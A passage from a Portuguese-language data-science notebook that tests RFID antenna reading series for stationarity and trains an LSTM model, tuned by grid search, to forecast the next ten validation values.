# + id="28Yu0pVRHhLB" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607186732109, "user_tz": 180, "elapsed": 1348, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="02c3bcf3-37c9-485b-9a91-f5c4e0dbe0fe"
df_filtered = df_final[(df_final['COUNT']<=60)]
print ("Tamanho Final (Linhas x Colunas): ", df_filtered.shape)
df_filtered.dropna(inplace=True)
# + [markdown] id="6qEcqhCR-atp"
# O novo resultado estatístico do dataset demonstrado abaixo, mostra que os dados agrupados de cada item tem um padrão coerente com os valores coletados da antena para cada item.
#
# Propositalmente foi decidido manter os itens com contagem baixa, como exemplo o item cujo minimo foi 4. Isso porque ao analisar o log, tratava-se de um item que foi aprovado pelo sistema. Esse tipo de comportamente é comum acontecer, apesar de fugir de um padrão de comportamento de leituras boas.
# + id="H7g6m86V-_Dv" colab={"base_uri": "https://localhost:8080/", "height": 297} executionInfo={"status": "ok", "timestamp": 1607186743366, "user_tz": 180, "elapsed": 976, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2affef35-6428-465d-ae12-ea47d5f733cc"
df_filtered.describe()
# + [markdown] id="98I5G007_sPs"
# ## Testes Estatísticos - Sérias Estacionárias
# + [markdown] id="7v5E81r3BDne"
# ### Plot do Gráfico
# + id="jh52nSBEHhLG" executionInfo={"status": "ok", "timestamp": 1607186751839, "user_tz": 180, "elapsed": 721, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
import matplotlib.pyplot as plt
# + [markdown] id="2MpBuIA9BMBh"
# Foi escolhido apenas uma fatia de 200 itens do dataset para melhor visualizar a série.
# + id="TmyB2M-VHhLJ" colab={"base_uri": "https://localhost:8080/", "height": 621} executionInfo={"status": "ok", "timestamp": 1607186754050, "user_tz": 180, "elapsed": 2919, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="3d4f2f3e-6d22-496c-b007-afe9f959d9ec"
plt.figure(figsize=(25,10))
ax1 = plt.subplot(211)
plt.plot(df_filtered.iloc[10000:10200, 2:6])
plt.ylabel('RSSI')
plt.title('Valores dos Agrupamentos do RSSI')
plt.setp(ax1.get_xticklabels(), visible=False)
plt.legend(df_filtered.columns[2:6])
ax2 = plt.subplot(212)
plt.plot(df_filtered.iloc[10000:10200, 6:7])
plt.ylabel('COUNT')
plt.xlabel('TIMESTAMP')
plt.title('Contagem')
plt.legend(df_filtered.columns[6:7])
plt.show()
# + [markdown] id="dkcS0v2qBmNY"
# ### Decomposição da Série Temporal
# + id="f-gGPrBuHhLL" executionInfo={"status": "ok", "timestamp": 1607186754388, "user_tz": 180, "elapsed": 3250, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
from statsmodels.tsa.seasonal import seasonal_decompose
# + [markdown] id="eaxmcgGmbXFc"
# #### *VALIDATION, MIN, MAX, MEAN*
# + id="ngBsjCW5HhLN" colab={"base_uri": "https://localhost:8080/", "height": 639} executionInfo={"status": "ok", "timestamp": 1607186756005, "user_tz": 180, "elapsed": 4858, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="00478dc4-5ac2-4627-e216-25d467a6660a"
temp = seasonal_decompose(df_filtered.iloc[10000:10200, 2:6], model='additive', freq=10)
fig = temp.plot()
fig.set_size_inches(25,10)
# + [markdown] id="RuVJBz_Ybey1"
# #### *COUNT*
# + id="S6qtwvQ1z6X0" colab={"base_uri": "https://localhost:8080/", "height": 631} executionInfo={"status": "ok", "timestamp": 1607186757270, "user_tz": 180, "elapsed": 6116, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="910c43bf-3389-475d-ba57-1f956364359a"
temp = seasonal_decompose(df_filtered.iloc[10000:11000, 6:7], model='additive',freq=10)
fig = temp.plot()
fig.set_size_inches(25,10)
# + [markdown] id="q26RbAtD4OgP"
# Observando os dados acima, percebemos que os valores mantem uma tendência estável sem viés de alta ou baixa, para um processo produtivo isso é um sinal muito bom, pois demonstra uma estabilidade das leituras.
#
# Sua sazonalidade é mínima variando apenas 1 ponto para quase todos os campos. Confirmando assim a estabilidade das leituras.
# + [markdown] id="tjYhLSV1B38U"
# ### Teste Estatístico Móveis (Média e Desvio Padrão)
# + id="vJP5EDHg-1t8" colab={"base_uri": "https://localhost:8080/", "height": 608} executionInfo={"status": "ok", "timestamp": 1607186760127, "user_tz": 180, "elapsed": 8967, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="ea084c65-d39e-4fca-c9a5-2cf57a73c2f5"
timeseries = df_filtered[['VALIDATION','MIN','MAX','MEAN','COUNT']].copy()
rollingmean = timeseries.rolling(window=200).mean()
rollingstd = timeseries.rolling(window=200).std()
rollingmean.dropna(inplace=True)
rollingstd.dropna(inplace=True)
plt.figure(figsize=(25,10))
for ix, col in enumerate(timeseries.columns):
ax = plt.subplot(5,1,ix+1)
plt.plot(timeseries[col], label='Original - ' + col)
plt.plot(rollingmean[col], color='red', label='Média Móvel')
plt.plot(rollingstd[col], color='black', label = 'Desvio Padrão Móvel')
plt.legend(loc='best')
plt.title('Média e Desvio Padrão Móveis - '+ col)
plt.tick_params(labelbottom=False)
plt.tick_params(labelbottom=True)
plt.show(block=False)
# + [markdown] id="V2Ljrp4cDCX7"
# Através dessa técnica podemos assumir visualmente que a série é estacionária pois sua média e desvio padrão se mantiveram praticamente constantes. Outro método que faremos a seguir é o teste estatístico de Dicky-Fuller.
# + [markdown] id="D42dhTUwRasn"
# ### Teste Estatístico Dickey-Fuller
# + id="_HwsBzfRSw1t" executionInfo={"status": "ok", "timestamp": 1607186760128, "user_tz": 180, "elapsed": 8966, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
from statsmodels.tsa.stattools import adfuller
# + id="qq2bOkD_RlJb" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607186795148, "user_tz": 180, "elapsed": 43980, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="4e2fcda4-5d3f-4445-83f5-235dfcc720b6"
for ix, col in enumerate(timeseries.columns):
print ('\nResultados do Teste Dickey-Fuller (%s)' % col)
dftest = adfuller(timeseries[col], autolag='AIC')
dfoutput = pd.Series(dftest[0:4], index=['Teste Estatístico','P-value','#Lags Usados','Num Observações'])
for key, value in dftest[4].items():
dfoutput['Valores Críticos (%s)' % key] = value
print (dfoutput)
# + [markdown] id="B2KFTScKWIkw"
# Os testes estatísticos de DF confirmam que a série é estacionária. Pois o Teste Estatístico foi menor que os valores críticos rejeitando a hipótese nula do teste de DF (Ho = Não Estacionária).
#
# Devido a isso nenhuma transformação será necessária na série.
# + id="WcuW9jye-66V" executionInfo={"status": "ok", "timestamp": 1607186795671, "user_tz": 180, "elapsed": 44502, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
df_filtered.to_csv('Dataset/FinalOutput.csv')
# + [markdown] id="St8gBhgjbrTg"
# ## Modelos
# + [markdown] id="ouRnxXJRbra_"
# A ideia será utlizar o Dataset resultante para treinar um modelo onde como entrada usaremos uma abordagem Multivariada com os valores do passado dos campos VALIDATION, MIN, MAX, MEAN e COUNT para prever os valores futuros do VALIDATION.
#
# Também faremos uma abordagem Univariada com os valores do passado do campo VALIDATION para prever os valores futuros do próprio VALIDATION.
#
# Com isso foi escolhido 2 modelos LSTM (Long-Short Term Memory) do Keras e o Prophet do Facebook. Ambos modelos muito utilizados em problemas de séries temporais.
#
# Optamos por escolher o modelo LSTM, abordado em aula, com o intuito de explorar seu uso e suas variações, expandindo assim o conhecimento aprendido em aula. Nos proximos tópicos faremos algumas abortagens nesse modelo com o uso de atributos Multivariado e Univariado. E também iremos usar uma abordagem para prever mais de um resultado (Multi-Step).
#
# Escolhemos outro modelo, não apresentado em aula, para explorar outras opções de modelos de Machine Learning e compará-lo com o primeiro modelo escolhido. Decidimos usar o Prophet do Facebook, pois é um modelo que tem sido considerado muito bom para problemas de séries temporais.
# + [markdown] id="g1g8qrElBkax"
# ###LSTM (Long-Short Term Memory)
# + id="H2h7RNf-rgmm" executionInfo={"status": "ok", "timestamp": 1607187495918, "user_tz": 180, "elapsed": 1031, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
from sklearn.preprocessing import MinMaxScaler
from sklearn.model_selection import train_test_split
# + [markdown] id="8VLj__UMBuGp"
# ####Preparação dos Dados:
# + [markdown] id="ntlhaYXNB_UP"
# A primeira etapa será transformar o dataset atual em um dataset característico de um problema de aprendizado supervisionado, onde dado os valores X(t-1) (VALIDATION, MIN, MAX, MEAN e COUNT), ele deverá prever o valor de y (t) (VALIDATION). Ou dado o período X(t), ele deverá prever o valor de y(t+1)...y(t+n). Onde (t) é o periodo presente, (t-1) é o período passado e (t+n) é o período futuro.
#
# Para isso será utilizado uma função que faz essa transformação com a intenção de ter uma flexibilidade da escolha dos períodos.
# + id="clMjbyk9EibH" executionInfo={"status": "ok", "timestamp": 1607187511058, "user_tz": 180, "elapsed": 1014, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
#Função para conversão de um dataset em formato para aprendizado supervisionado. Trecho tirado do artigo abaixo:
#https://machinelearningmastery.com/multivariate-time-series-forecasting-lstms-keras/
def series_to_supervised(data, n_in=1, n_out=1, dropnan=True):
n_vars = 1 if type(data) is list else data.shape[1]
df = pd.DataFrame(data)
cols, names = list(), list()
# input sequence (t-n, ... t-1)
for i in range(n_in, 0, -1):
cols.append(df.shift(i))
names += [('var%d(t-%d)' % (j+1, i)) for j in range(n_vars)]
# forecast sequence (t, t+1, ... t+n)
for i in range(0, n_out):
cols.append(df.shift(-i))
if i == 0:
names += [('var%d(t)' % (j+1)) for j in range(n_vars)]
else:
names += [('var%d(t+%d)' % (j+1, i)) for j in range(n_vars)]
# put it all together
agg = pd.concat(cols, axis=1)
agg.columns = names
# drop rows with NaN values
if dropnan:
agg.dropna(inplace=True)
return agg
# + [markdown] id="4M2EaW3opf5K"
# Carregamento do dataset e pegando apenas os seus valores:
# + id="lMduQ4LgF4qP" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607187515980, "user_tz": 180, "elapsed": 1028, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="252c6d57-c24a-4750-eb85-3a9dd3e2aac2"
df_LSTM = pd.read_csv('Dataset/FinalOutput.csv', index_col=0)
df_LSTM = df_LSTM.drop(['TIMESTAMP','EPC'], axis=1)
dfValues = df_LSTM.values
dfValues = dfValues.astype('float32')
dfValues
# + [markdown] id="gTb2Jm3FXgmb"
# Inicialmente faremos a transformação da série apenas para mostrar o funcionamento da função com 1 período.
# + id="I1KiQYKW0Rxy" colab={"base_uri": "https://localhost:8080/", "height": 204} executionInfo={"status": "ok", "timestamp": 1607187521505, "user_tz": 180, "elapsed": 846, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="d15c26bf-d0cd-44b0-ace1-af925ebc839b"
dfNovo = series_to_supervised(dfValues, n_in=1, n_out=1, dropnan=True)
dfNovo.head()
# + [markdown] id="tFChwz-yXtj4"
# Abaixo a transformação escolhida será para atender o que chamamos de método Multivariating - Multi-Step forecast, na realidade é a junção de 2 métodos que encontramos na literatura e exemplos do LSTM.
#
# **Multivariating** significa que utilizaremos mais de 1 característica com entrada para treinar o modelo.
#
# **Multi-Step** significa que iremos, através de um período passado prever 10 períodos futuros.
# Como o objetivo é prever o valor do campo VALIDATION aqui representado pela (var1) não precisaremos dos outros atributos e por isso vamos removê-lo desse resultado.
# + id="h2Z1r9nuAAs9" colab={"base_uri": "https://localhost:8080/", "height": 270} executionInfo={"status": "ok", "timestamp": 1607187611772, "user_tz": 180, "elapsed": 1004, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="12d16efa-f887-4789-c872-25ad32682e7d"
dfNovo10 = series_to_supervised(dfValues, n_in=30, n_out=10, dropnan=True)
dropList = list()
for i in range(0, 10, 1):
if i==0:
dropList.append('var2(t)')
dropList.append('var3(t)')
dropList.append('var4(t)')
dropList.append('var5(t)')
else:
dropList.append('var2(t+'+str(i)+')')
dropList.append('var3(t+'+str(i)+')')
dropList.append('var4(t+'+str(i)+')')
dropList.append('var5(t+'+str(i)+')')
dfNovo10.drop(dropList, axis=1, inplace=True)
dfNovo10.head()
# + [markdown] id="B8DEJrp4CMSv"
# #### Separação dos dados em treino e teste
# + [markdown] id="NejCTgOMCWOi"
# Para separação entre treino e teste, deixaremos 80% dos dados para treino e 20% para teste.
# + id="tdor9BgCnqoh" colab={"base_uri": "https://localhost:8080/", "height": 270} executionInfo={"status": "ok", "timestamp": 1607187627211, "user_tz": 180, "elapsed": 944, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="ad7e9b61-ed3c-4d52-8f26-4bea8f796d7f"
dfNovo10.head(5)
# + [markdown] id="cJXgNSDgcDyA"
# Os 5 primeiros atributos dos 30 periodos passados serão salvos em X. E as 10 próximas colunas que representam nossa Classe serão salvos em y.
# + id="hl7bQAdnC-RI" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607187632275, "user_tz": 180, "elapsed": 559, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="9d296bf1-e690-4969-eec1-3ffc1400a26c"
X = np.array(dfNovo10)[:, :(30*5)]
print ('Atributos (%d x %d):' % (X.shape[0],X.shape[1]))
print (X)
y = np.array(dfNovo10)[:,(30*5):]
print ('Classe (%d x %d):' % (y.shape[0],y.shape[1]))
print (y)
# + [markdown] id="_iLLMsGOchKh"
# Aplicaremos a normalização dos dados usando o MinMaxScaler para cada X e y para melhorar a performance do treinamento e trazer todos os atributos para a mesma base.
# + id="Fl1RkmHTnFpv" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607187640636, "user_tz": 180, "elapsed": 989, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="4f9147aa-a5e1-4350-831c-b234b3ae59b0"
scalerX = MinMaxScaler(feature_range=(0, 1))
scalerY = MinMaxScaler(feature_range=(0, 1))
X_N = scalerX.fit_transform(X)
y_N = scalerY.fit_transform(y)
print('Tamanho do Dataset: ', X_N.shape[0])
print('Quantidade de Períodos (Atributos): ', X_N.shape[1])
print('Quantidade de Períodos (Classe): ', y_N.shape[1])
# + [markdown] id="_sIFqJm_F2Cb"
# Faremos a separação entre os atributos e classes para ambos os arrays (treino e teste) usando a biblioteca do sklearn.
# + id="5RzRyqurGBUG" colab={"base_uri": "https://localhost:8080/", "height": 316} executionInfo={"status": "ok", "timestamp": 1607187644709, "user_tz": 180, "elapsed": 1073, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="28412a3d-5249-4425-cff7-a6350cd15c25"
X_Train, X_Test, y_Train, y_Test = train_test_split(X_N, y_N, test_size=0.2, shuffle=False, random_state=100)
plt.pie([X_Train.shape[0],X_Test.shape[0]], labels=['Train','Test'], shadow=True)
plt.show()
print('Atributos - Train: ', X_Train.shape)
print('Atributos - Test:', X_Test.shape)
print('Classes - Train: ', y_Train.shape)
print('Classes - Test:', y_Test.shape)
# + [markdown] id="ixZjUtA0MqGq"
# Precisaremos acerter a dimensão dos arrays pois o LSMT espera um que seja um array 3D (samples, timesteps, attributes). Nesse caso utilizaremos (Shape[0], 30, 5) onde o valor 30 é devido à 30 periodos e o valor 5 é referente aos 5 atributos que a série possui.
# + id="2Q8o_C89Mon4" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607187657827, "user_tz": 180, "elapsed": 979, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="c27f826a-4402-421b-b96b-9ef6e3afcdf8"
X_Train = X_Train.reshape((X_Train.shape[0], 30, 5))
X_Test = X_Test.reshape((X_Test.shape[0], 30, 5))
print (X_Train.shape, X_Test.shape, y_Train.shape, y_Test.shape)
# + colab={"base_uri": "https://localhost:8080/"} id="swSZdTg0Keq-" executionInfo={"status": "ok", "timestamp": 1607187660008, "user_tz": 180, "elapsed": 1001, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="c71299fc-2530-4e2e-805d-b63ced75586a"
X_Train[0]
# + [markdown] id="x4-vcLw2NTyT"
# #### Arquitetura do Modelo e Treino
# + id="HAloPNBMN4jA" executionInfo={"status": "ok", "timestamp": 1607187667012, "user_tz": 180, "elapsed": 2215, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
from keras.models import Sequential, load_model
from keras.layers import Dense, LSTM, Dropout
# + [markdown] id="tbIZ2zQELc8H"
# Foi criado essa função para facilitar na análise dos parametros do modelo, onde foram testadas várias arquiteturas e a que melhor apresentou resultados foi a arquitetura abaixo.
# + id="mzojPychsCLd" executionInfo={"status": "ok", "timestamp": 1607187669739, "user_tz": 180, "elapsed": 1069, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
def fitModel (X_Train, y_Train, X_Test, y_Test, input, batch, epochs):
model = Sequential()
model.add(LSTM(input, input_shape=(X_Train.shape[1], X_Train.shape[2])))
model.add(Dense(10, activation='relu'))
model.add(Dense(10))
model.compile(loss='mae', optimizer='adam')
# fit network
history = model.fit(X_Train, y_Train, epochs=epochs, batch_size=batch, validation_data=(X_Test, y_Test), verbose=1, shuffle=False)
# plot history
plt.plot(history.history['loss'], label='train')
plt.plot(history.history['val_loss'], label='test')
plt.legend()
plt.show()
return history, model
# + [markdown] id="reUp35wxLriX"
# Criamos um gridSearch manual no qual ele treina o modelo para cada parametro estipulado. Sua entrada é a quantidade de loops que cada FOR vai executar. O primeiro é a variação entre os batchs que vai de 2 à 64, crescendo de forma exponencial. A próxima variação é o input da rede que varia da mesma forma e por fim a quantidade de épocas que aumenta de 5 em 5.
# + id="VSulavluxhru" executionInfo={"status": "ok", "timestamp": 1607187674847, "user_tz": 180, "elapsed": 1013, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
def myGridSearch(loopA, loopB, loopC):
hist = []
input = 1
batch = 1
epochs = 0
for i in range(loopA):
epochs = epochs+5
for z in range(loopB):
input = input*2
for j in range(loopC):
batch = batch*2
print('================FIT Parameters -> epochs: %d -> input: %d -> batch: %d ====================' % (epochs,input,batch))
hist.append(fitModel(X_Train, y_Train, X_Test, y_Test, input, batch, epochs))
batch=1
input=1
return hist
# + [markdown] id="JA_tb7LzM_bu"
# Analizando o resultado abaixo identificamos que o melhor parâmetro foram **Epochs = 15, Input = 64 e Batch = 4** ou **Epoch = 10, Input = 32 e Batch = 2**. Esses dois resultados deram um valor de loss muito parecidos.
# + id="MJ8ecNsp3D2w" colab={"base_uri": "https://localhost:8080/", "height": 1000} outputId="b9415bec-69da-4342-e2fa-c35e5e3a1f52"
losses = myGridSearch(3,6,6)
print(losses)
# + [markdown] id="eIaBeA1iWvVM"
# Para critério de comparação criamos um GridSearch utilizando o SKlearn e os mesmos parâmetros.
# + id="KUDX18U5EhhH" executionInfo={"status": "ok", "timestamp": 1607187703436, "user_tz": 180, "elapsed": 1007, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
from keras.wrappers.scikit_learn import KerasClassifier, KerasRegressor
from sklearn.model_selection import GridSearchCV
def build_classifier(optimizer,units):
grid_model = Sequential()
grid_model.add(LSTM(units = units, input_shape = (30,5)))
grid_model.add(Dense(10, activation='relu'))
grid_model.add(Dense(10))
grid_model.compile(loss = 'mae',optimizer = optimizer, metrics = ['mean_squared_error'])
return grid_model
# + [markdown] id="J3u9OxGfXAFl"
# Os valores abaixo foram os mesmos utilizados no myGridSearch. A diferença foi no dado de entrada, nesse caso utilizei o dataset inteiro devido ao parâmetro de crossvalidation do gridsearch.
# + colab={"base_uri": "https://localhost:8080/"} id="ehmle_2seUT8" executionInfo={"status": "ok", "timestamp": 1605996396712, "user_tz": 180, "elapsed": 29920541, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="c9565f60-aebc-43b9-ff4f-ad86f822bb4f"
grid_model = KerasRegressor(build_fn=build_classifier)
parameters = {'batch_size' : [2,4,8,16,32,64],
'epochs' : [5,10,15],
'units' : [2,4,8,16,32,64],
'optimizer' : ['adam'] }
grid_search = GridSearchCV(estimator = grid_model,
param_grid = parameters,
#scoring = 'max_error',
cv = 2)
grid_search = grid_search.fit(X_N.reshape((X_N.shape[0], 30, 5)), y_N)
# + id="Ztq2dQ0sE0qG"
best_parameters = grid_search.best_params_
best_accuracy = grid_search.best_score_
# + [markdown] id="ptH5RZsjX12P"
# O melhor valor sugerido deu bem diferente dos testes do myGridSearch. Para validar novamente os resultados sugeridos eu rodei o treino individualmente.
# + colab={"base_uri": "https://localhost:8080/"} id="Zq0d_wFiE6ZV" executionInfo={"status": "ok", "timestamp": 1605996399459, "user_tz": 180, "elapsed": 2661, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="06697b1e-72c4-477f-ba6a-175f17ca6230"
best_parameters
# + [markdown] id="_ci5ELXqYVol"
# Treinamento utilizando os parâmetros do GridSearch (sklearn):
# + colab={"base_uri": "https://localhost:8080/", "height": 608} id="2bTAU7HLH7pW" executionInfo={"status": "ok", "timestamp": 1606138955294, "user_tz": 180, "elapsed": 56147, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="a390d850-b68b-4189-c413-7c4d582bcea1"
hist, model = fitModel (X_Train, y_Train, X_Test, y_Test, 16, 64, 10)
# + [markdown] id="GBpwCifLYcnR"
# Treinamento utilizando os parâmetros do myGridSearch:
# + colab={"base_uri": "https://localhost:8080/", "height": 775} id="BpU4_n_XV5-o" executionInfo={"status": "ok", "timestamp": 1607188231342, "user_tz": 180, "elapsed": 485180, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="8b328d84-64c7-4d04-f5d4-ff6928d8f6c2"
hist, model = fitModel (X_Train, y_Train, X_Test, y_Test, 64, 4, 15)
# + id="SxhRt2pc5I3S" executionInfo={"status": "ok", "timestamp": 1607188241839, "user_tz": 180, "elapsed": 758, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
model.save('model_LSTM.h5')
# + [markdown] id="MMDGOMgfjudI"
# O modelo escolhido foi salvo para uso futuro e não precisar rodar as etapas acima novamente. Em seguida carregaremos o modelo treinado para iniciar as predições.
# + [markdown] id="El62PtWIkLKj"
# #### Predição e Métricas (RMSE)
# + id="hvft41IophDz" executionInfo={"status": "ok", "timestamp": 1607188253522, "user_tz": 180, "elapsed": 1293, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
model = load_model('model_LSTM.h5')
# + [markdown] id="mdkmQ83xlOS3"
# Lembrando que a idéia é fazer a predição ou forecast dos próximos 10 valores de validação do sistema RFID e compará-lo com a base de teste para calcular o erro e medir sua eficácia.
#
# A função abaixo será chamada para fazer a predição que retornar um array de tamanho 10 com os resultados.
# + id="3juCpohCUVvn" executionInfo={"status": "ok", "timestamp": 1607188266522, "user_tz": 180, "elapsed": 1014, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
def predict_lstm(model, X, n_batch):
# reshape para [samples, timesteps, features]
# Como será feito o predict de item a item a transformação será feita conforme abaixo.
X = X.reshape(1, X.shape[0], X.shape[1])
# Fazer o forecast
forecast = model.predict(X, batch_size=n_batch)
# Transforma em array para melhor trabalhar com os resultados
return [x for x in forecast[0, :]]
# + [markdown] id="DbXa266boU7T"
# Abaixo iremos montar o yPred, ou seja, as predições de todo o X_Test.
# + colab={"base_uri": "https://localhost:8080/"} id="MaZ8oEwYlwHl" executionInfo={"status": "ok", "timestamp": 1607188577241, "user_tz": 180, "elapsed": 275842, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="83e56676-14ae-4067-b17f-9c1fab23f55e"
yPred = list()
for i in range (len(X_Test)):
forecast = predict_lstm(model, X_Test[i], 1)
yPred.append(forecast)
yPred
# + [markdown] id="zFyy5yCTq1cL"
# Para facilitar a comparação iremos transformar o y_Test em uma lista de arrays.
# + id="3Ay36f0gG00B" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607188577242, "user_tz": 180, "elapsed": 156000, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="96c675e4-0872-4f7a-b864-6b742b8f8435"
yTest = [row[:] for row in y_Test]
yTest
# + [markdown] id="08GEySzlrgXC"
# Utilizando a função de Mean_Squared_Error do Sklearn iremos calcular o erro em cada saida.
